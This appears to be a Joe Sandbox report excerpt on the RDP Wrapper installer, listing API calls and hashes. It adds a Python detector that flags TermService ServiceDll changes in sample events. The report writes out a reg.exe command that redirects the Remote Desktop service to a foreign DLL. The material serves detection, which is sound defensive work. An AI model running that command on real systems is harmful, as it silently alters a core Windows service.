                                                    • Opcode Fuzzy Hash: 0c5b84642f90c2c43a864384322aaebdce3b992f712f0d9bf057b86ee0e3b406
                                                    • Instruction Fuzzy Hash: B331DE74A04204AFDB10FB66CC82A2E77A5DB4D308F61A07BF800B7291CB3CAD049B5D
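The two function entries above are the core of the RDPWrap install step: the installer opens HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters and repoints the REG_EXPAND_SZ value ServiceDll at its own DLL, and if the direct registry write fails ("[-] OpenKey error") it spawns reg.exe add ... /v ServiceDll /t REG_EXPAND_SZ /d "<dll>" /f via CreateProcessW and waits on the process handle. Either route produces the same observable: TermService no longer loads the stock termsrv.dll. The detection below is an added example written for this page, not code from the Joe Sandbox report or from the RDP Wrapper project. It evaluates constructed Sysmon-style events (a registry value set and a process creation with the reg.exe command line) and flags any ServiceDll that does not resolve to %SystemRoot%\System32\termsrv.dll. The DLL path C:\Program Files\RDP Wrapper\rdpwrap.dll in the sample events is an assumption; this report section shows the reg.exe command template but not the path the sample actually wrote.

```python
import re

# Stock value of TermService's ServiceDll (REG_EXPAND_SZ) on Windows. Anything else means
# the Remote Desktop service will load a foreign DLL, which is exactly what RDPWrap does.
DEFAULT_TERMSRV_DLL = r"%SystemRoot%\System32\termsrv.dll"
TERMSERVICE_PARAMS = r"HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters"


def _norm_key(key):
    """Canonicalise a registry key path: long hive name -> HKLM, lower case, no trailing slash."""
    k = key.strip().strip('"').replace("/", "\\").rstrip("\\").lower()
    return re.sub(r"^hkey_local_machine", "hklm", k)


def normalize_servicedll(value, system_root=r"C:\Windows"):
    """Expand %SystemRoot%/%windir%, unify separators and case so paths compare reliably."""
    v = value.strip().strip('"')
    v = re.sub(r"%(systemroot|windir)%", lambda _m: system_root, v, flags=re.I)
    v = re.sub(r"[\\/]+", lambda _m: "\\", v)
    return v.lower()


def is_hijacked_servicedll(value):
    """True when ServiceDll does not resolve to the stock termsrv.dll."""
    return normalize_servicedll(value) != normalize_servicedll(DEFAULT_TERMSRV_DLL)


def _tokens(cmdline):
    # Windows-style split: a double-quoted run is one token (quotes removed).
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def parse_reg_add(cmdline):
    """Parse `reg[.exe] add <key> /v <name> /t <type> /d <data> [/f]`; None if not a reg add."""
    toks = _tokens(cmdline)
    for i, t in enumerate(toks):
        if re.split(r"[\\/]", t.lower())[-1] in ("reg", "reg.exe"):
            break
    else:
        return None
    if i + 2 >= len(toks) or toks[i + 1].lower() != "add":
        return None
    out = {"key": toks[i + 2], "value_name": None, "value_type": None, "data": None, "force": False}
    names = {"/v": "value_name", "/t": "value_type", "/d": "data"}
    j = i + 3
    while j < len(toks):
        opt = toks[j].lower()
        if opt == "/f":
            out["force"] = True
            j += 1
        elif opt in names and j + 1 < len(toks):
            out[names[opt]] = toks[j + 1]
            j += 2
        else:
            j += 1
    return out


def scan_events(events):
    """Return (source, dll_path) findings for TermService ServiceDll changes that leave the stock DLL."""
    findings = []
    for ev in events:
        if ev["type"] == "registry_set":
            if (_norm_key(ev["key"]) == _norm_key(TERMSERVICE_PARAMS)
                    and ev["value_name"].lower() == "servicedll"
                    and is_hijacked_servicedll(ev["data"])):
                findings.append(("registry", ev["data"]))
        elif ev["type"] == "process_create":
            p = parse_reg_add(ev["command_line"])
            if (p and _norm_key(p["key"]) == _norm_key(TERMSERVICE_PARAMS)
                    and (p["value_name"] or "").lower() == "servicedll"
                    and is_hijacked_servicedll(p["data"] or "")):
                findings.append(("reg.exe", p["data"]))
    return findings


# Constructed sample events (not from the report): one benign write, one direct hijack,
# the reg.exe fallback seen in the strings above, and an unrelated reg.exe query.
SAMPLE_EVENTS = [
    {"type": "registry_set", "key": TERMSERVICE_PARAMS, "value_name": "ServiceDll",
     "data": r"%SystemRoot%\System32\termsrv.dll"},
    {"type": "registry_set",
     "key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters",
     "value_name": "ServiceDll", "data": r"C:\Program Files\RDP Wrapper\rdpwrap.dll"},  # assumed path
    {"type": "process_create",
     "command_line": r'"C:\Windows\system32\reg.exe" add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll" /f'},
    {"type": "process_create",
     "command_line": r'reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll'},
]

if __name__ == "__main__":
    for source, dll in scan_events(SAMPLE_EVENTS):
        print(f"TermService ServiceDll hijack via {source}: {dll}")
```

Comparing against the expanded default rather than matching on the string "rdpwrap" is deliberate: the same registry value is the hook for any termsrv.dll replacement, and a renamed DLL or a path built from a different environment variable should still fire. On a live host the same comparison can be made against the value read from the key directly, and the Sigma rule "RDP Sensitive Settings Changed" listed in the report's signature section covers the reg.exe route at process-creation time.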
                                                    APIs
                                                    • Sleep.KERNEL32(00000000,?,00402C72), ref: 00402D5B
                                                    • Sleep.KERNEL32(0000000A,00000000,?,00402C72), ref: 00402D71
                                                    • Sleep.KERNEL32(00000000,?,?,?,00402C72), ref: 00402D9F
                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,?,00402C72), ref: 00402DB5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                    • Instruction ID: 31c3f393645164f4675e576557a9223240219fe3669f0ad713ca74d6ded16897
                                                    • Opcode Fuzzy Hash: 50f8b12719e1c4c784f8227bf124f2ef405a8e2e831e3cb3860c1e75e50a0c63
                                                    • Instruction Fuzzy Hash: B4C147766052518FD715CF28DE8831ABBE0AB86314F1882BFD444BB3D5C7B89946CBD8
                                                    APIs
                                                    • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409497
                                                    • lstrlenW.KERNEL32(?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 004094A3
                                                    • GetUserDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 00409530
                                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,?,00000000,00000105,00000000,004095BB,?,00437408,?,00000000), ref: 0040955C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DefaultLanguage$SystemUserlstrcpynlstrlen
                                                    • String ID:
                                                    • API String ID: 3749826553-0
                                                    • Opcode ID: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                    • Instruction ID: 670d7e8fee0ffa615f00d819e5c077188fbd82142d60affd8ce3058b6d31cf6a
                                                    • Opcode Fuzzy Hash: d710f7c1299fe0245be1f89c25ed315f3e3ffeabd22d09ed061d9454a6b695c6
                                                    • Instruction Fuzzy Hash: 37416571A002195ED721EB6ADC8978EB3B4EF48304F5005BAE448B72D2DB789E908E58
                                                    APIs
                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 004040D2
                                                    • VirtualFree.KERNEL32(00449AC8,00000000,00008000,?,00000000,00008000,?,?,?,?,00404194,0040A1B9,00000000,0040A1E0), ref: 0040412F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FreeVirtual
                                                    • String ID: $zD$xPD
                                                    • API String ID: 1263568516-535612291
                                                    • Opcode ID: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                    • Instruction ID: 63e96df57fdc30e3e5434cdd8ac4306be2e0fcd0727744789414a485f14a8afc
                                                    • Opcode Fuzzy Hash: ee1e8e4c5ce6b12cd624387e406e1cf1ad3c0fb6f8253ccd4ae2b310545238de
                                                    • Instruction Fuzzy Hash: CF1161B13012009FDB248F059985B26BAE5EBC4714F55C0BEE309AF3C2D679EC01CB58
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438B85
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00438CCF,?,?,?,00000000), ref: 00438BFB
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00438C6C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID:
                                                    • API String ID: 71445658-0
                                                    • Opcode ID: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                    • Instruction ID: 3681a8d3f24b20706dc106850b3bb9ce640454c4e8124a7cc358b0d46e7adf70
                                                    • Opcode Fuzzy Hash: 56a7ec8d88e5670b99992fed871dbba86343d1eb3cba1c9f5227469b2a4bb512
                                                    • Instruction Fuzzy Hash: 1F51A370B00344AFDB11EBA5C842B9EF7F9AB48304F11547EB444A3282CA7DAF069759
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                    • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                    • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                    • String ID:
                                                    • API String ID: 3490077880-0
                                                    • Opcode ID: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                    • Instruction ID: 823ae625d887489e04d5fb836baef855571e76b59bd7737af2fa314308855dda
                                                    • Opcode Fuzzy Hash: 366fdbe2bdf6eda399ec161f43325e884a453738e97a5e27564f450e25dd0238
                                                    • Instruction Fuzzy Hash: 0D316F749002508BEF21BF69988975737A0AB05319F1640BFE806AB2D7C77C9CA4CB9D
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                    • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                    • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                    • String ID:
                                                    • API String ID: 3490077880-0
                                                    • Opcode ID: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                    • Instruction ID: 46b61aa2349ed196f7bea0abd1f985a96ea7bcfce35a4251490327c9ac1ca2fd
                                                    • Opcode Fuzzy Hash: 4e2b89c40ccb1b4c43cad0f32e0a83214a0d4d0925328316d29d930894bce137
                                                    • Instruction Fuzzy Hash: 1331A2749002908BDF21BF78888975737A0AB06319F1640BFE845AB2D7C37C9CA4CB9D
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00406251
                                                    • FreeLibrary.KERNEL32(00400000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 004062D2
                                                    • ExitProcess.KERNEL32(00000000,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000,00404320,00447324,00404C2E,?,?,RDP Wrapper Library v1.6.2), ref: 0040630E
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283,00000000), ref: 004061C9
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C,00000000,00406336,0040A254,00000000,0040A283), ref: 004061CF
                                                      • Part of subcall function 00406190: GetStdHandle.KERNEL32(000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000,00404C6C), ref: 004061E4
                                                      • Part of subcall function 00406190: WriteFile.KERNEL32(00000000,000000F5,0040621C,00000002,0000D7B2,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,0000D7B2,00000000,?,00406241,?,00000000), ref: 004061EA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                    • String ID:
                                                    • API String ID: 3490077880-0
                                                    • Opcode ID: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                    • Instruction ID: d971c45546d1ba4d910c131f5b4d15d6df32f901540fb653785064192c66a389
                                                    • Opcode Fuzzy Hash: 6b58315340373024079e24359f3f29825cf54609d1d79e5c4cc5367edd112065
                                                    • Instruction Fuzzy Hash: 712191749002508BDF21BF79988975737A0AB06319F1640BFE806AB2C7C37C9CA4CB9D
                                                    APIs
                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00402F9F,?,00402C72), ref: 004029A6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID: $zD$$zD
                                                    • API String ID: 4275171209-354537599
                                                    • Opcode ID: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                    • Instruction ID: 5217acd6ab2d11c2bd36ab0357f96252e91eb64f60a530f80fec48377855cdbd
                                                    • Opcode Fuzzy Hash: 1540fdcf1954a72339a161570870ab93fcd0dcb29e693a4e8299ffb28a0cb967
                                                    • Instruction Fuzzy Hash: 8AF062F1B143004FDB45CF799D853157AD1A78A318F20807EE608EB7E8EBB484468B48
                                                    APIs
                                                    • SysFreeString.OLEAUT32(00000000), ref: 004068D2
                                                    • SysAllocStringLen.OLEAUT32(?,?), ref: 004069DF
                                                    • SysFreeString.OLEAUT32(?), ref: 004069F1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: String$Free$Alloc
                                                    • String ID:
                                                    • API String ID: 986138563-0
                                                    • Opcode ID: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                    • Instruction ID: fb71732fc0ca27c4a1f64b9cddcd98791c7700d24e5edf769cc3926ad45b99af
                                                    • Opcode Fuzzy Hash: 552166d6c025dde526ed4baf3a4c1e22db0c7fdbaa80c72df019331380f0f916
                                                    • Instruction Fuzzy Hash: D6E08CB91022017DEA002F228D14B3B3368AF82311B6980BFB401BA2D1D67C88419A3C
                                                    APIs
                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 0043991B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: QueryValue
                                                    • String ID: ImagePath
                                                    • API String ID: 3660427363-1008103227
                                                    • Opcode ID: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                    • Instruction ID: d4c3dc3867a5d7f93f9a48779984ca1be9368a485682844844f209d8ad6df9e6
                                                    • Opcode Fuzzy Hash: 8f9baab103978417c959294274641bc3878bd645011188ec3b2bcbd739b8bb79
                                                    • Instruction Fuzzy Hash: C0019E76604208AFDB00EFA9CC81EDFB7A8EB49314F00817AB954D7342DA749E048BA5
                                                    APIs
                                                    • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00439A26,?,?,00447324), ref: 00439A0B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Open
                                                    • String ID: $sD
                                                    • API String ID: 71445658-3047594130
                                                    • Opcode ID: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                    • Instruction ID: 93af5e93b009f9dfb1ca8860ce5652d254f583336edc44d6a4486ea6cd266cab
                                                    • Opcode Fuzzy Hash: f10055141223f9af242b891c647282ca0f63b0c3ab4bd570c77cf0f661a267fa
                                                    • Instruction Fuzzy Hash: 19017571B04208AFD714EB65CC52A9EB3FCEB4C304F61457BF445E3281DA79EE149658
                                                    APIs
                                                    • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,ServiceDll,?,?), ref: 004398AE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                     • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmp
